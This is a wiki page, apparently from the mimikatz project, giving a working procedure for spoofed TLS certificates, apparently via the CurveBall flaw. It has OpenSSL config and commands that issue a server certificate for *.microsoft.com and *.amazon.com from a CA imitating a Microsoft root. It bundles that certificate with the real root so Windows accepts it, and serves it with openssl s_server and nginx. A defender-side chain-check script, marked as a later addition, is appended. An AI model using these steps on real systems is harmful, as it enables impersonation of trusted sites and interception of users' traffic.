1. Kiwi Legit WebServer

Benjamin DELPY edited this page Jan 24, 2020 · 6 revisions

Now that you have a Certificate Authority [...]

OpenSSL shared configuration for WebServer

Create a srv.cnf OpenSSL config file with

extensions = extensions

[req]
prompt = no
utf8 = no
distinguished_name = req_distinguished_name
x509_extensions = extensions

[req_distinguished_name]

[extensions]
basicConstraints=critical, CA:FALSE
subjectKeyIdentifier=hash
keyUsage=critical, digitalSignature,keyEncipherment
extendedKeyUsage=serverAuth
subjectAltName=DNS:*.amazon.com, DNS:*.microsoft.com, DNS:secure.server.private
# crlDistributionPoints=crlDistributionPoint
#
# [crlDistributionPoint]
  • Adapt subjectAltName to your configuration;
  • A CRL Distribution Point extension would make the pseudo-validation fail, which is why it is left commented out.

Create RSA private key & signed certificate with the legit authority

openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out srv_microsoft_product.key

openssl req -config srv.cnf -new -sha256 -key srv_microsoft_product.key -subj "/C=FR/CN=Kiwi Microsoft ECC Product Web Server" -out srv_microsoft_product.csr

openssl x509 -req -extfile srv.cnf -in srv_microsoft_product.csr -CA microsoft_product.crt -CAkey ./private/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.key -CAcreateserial -out srv_microsoft_product.crt -days +1825

It must give you:

Signature ok
subject=C = FR, CN = Kiwi Microsoft ECC Product Web Server
Getting CA Private Key

and the files srv_microsoft_product.key and srv_microsoft_product.crt (you can delete srv_microsoft_product.csr and microsoft_product.srl).

Test the WebServer certificate

OpenSSL

cat microsoft_product.crt ./public/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt > microsoft_product.legit_with_real.crt

This gives you a bundle with the legit certificate authority followed by the real one: it will 'force' Windows to acquire the real one if it is not already in the root certificate store.

Then start a test server (as root, or change the port):

openssl s_server -accept 443 -www -cert srv_microsoft_product.crt -key srv_microsoft_product.key -cert_chain microsoft_product.legit_with_real.crt

nginx

cat srv_microsoft_product.crt microsoft_product.crt ./public/CACA93B9D23D2B6FA76E8B8471931E0DF3EC6F63AF3CDBB936C41954A1872326.crt > srv_microsoft_product.legit_with_real.crt

This gives you a bundle with the server certificate, then the legit certificate authority, then the real one: it will 'force' Windows to acquire the real one if it is not already in the root certificate store.

server {
...
        listen 443 ssl;
        ssl_certificate srv_microsoft_product.legit_with_real.crt;
        ssl_certificate_key srv_microsoft_product.key;
...
}
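As an added defender-side example (not part of the original page or of mimikatz), the following POSIX shell script checks a served bundle like the ones above against a locally pinned root: a certificate that carries the trusted root's subject name is only accepted if its full SubjectPublicKeyInfo, curve parameters included, is byte-identical to the pinned root's, and the chain is then verified with that root as the only trust anchor. Function and file names are assumptions for this example.

```bash
#!/bin/sh
# Added example, not part of the original wiki page: a defender-side chain check.
# A bundle certificate that reuses a trusted root's subject is accepted only if its
# DER SubjectPublicKeyInfo (key AND parameters) matches the trusted root's exactly;
# the server certificate is then verified with the real root as the sole anchor.
# File names are placeholders chosen for this example.
set -eu

# SHA-256 of the DER-encoded SubjectPublicKeyInfo of a PEM certificate.
spki_sha256() {
    openssl x509 -in "$1" -noout -pubkey 2>/dev/null \
        | openssl pkey -pubin -outform DER 2>/dev/null \
        | openssl dgst -sha256 | sed 's/^.*= //'
}

# check_chain SERVER_CERT CA_BUNDLE TRUSTED_ROOT
# CA_BUNDLE is what the server sent alongside its certificate; TRUSTED_ROOT is the
# locally pinned root. Prints OK and returns 0 only when no bundle certificate
# impersonates the root by name and openssl can build a valid chain to TRUSTED_ROOT.
check_chain() {
    srv=$1; bundle=$2; root=$3
    root_subj=$(openssl x509 -in "$root" -noout -subject)
    root_spki=$(spki_sha256 "$root")
    tmp=$(mktemp -d)
    # split the PEM bundle into one file per certificate (c1.pem, c2.pem, ...)
    awk -v d="$tmp" '/-----BEGIN CERTIFICATE-----/{n++} n>0{print > (d "/c" n ".pem")}' "$bundle"
    for c in "$tmp"/c*.pem; do
        if [ "$(openssl x509 -in "$c" -noout -subject 2>/dev/null)" = "$root_subj" ] \
           && [ "$(spki_sha256 "$c")" != "$root_spki" ]; then
            echo "REJECT: bundle certificate carries the trusted root's subject with a different key"
            rm -rf "$tmp"; return 1
        fi
    done
    rm -rf "$tmp"
    # name-based match is not enough: the signature chain must also reach the pinned root
    if ! openssl verify -CAfile "$root" -untrusted "$bundle" "$srv" >/dev/null 2>&1; then
        echo "REJECT: no valid chain to the trusted root"; return 1
    fi
    echo OK
}
```

Run it as `check_chain srv.crt bundle.crt pinned_root.crt`; an exit status of 1 with a REJECT line means the served chain should not be trusted.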

Results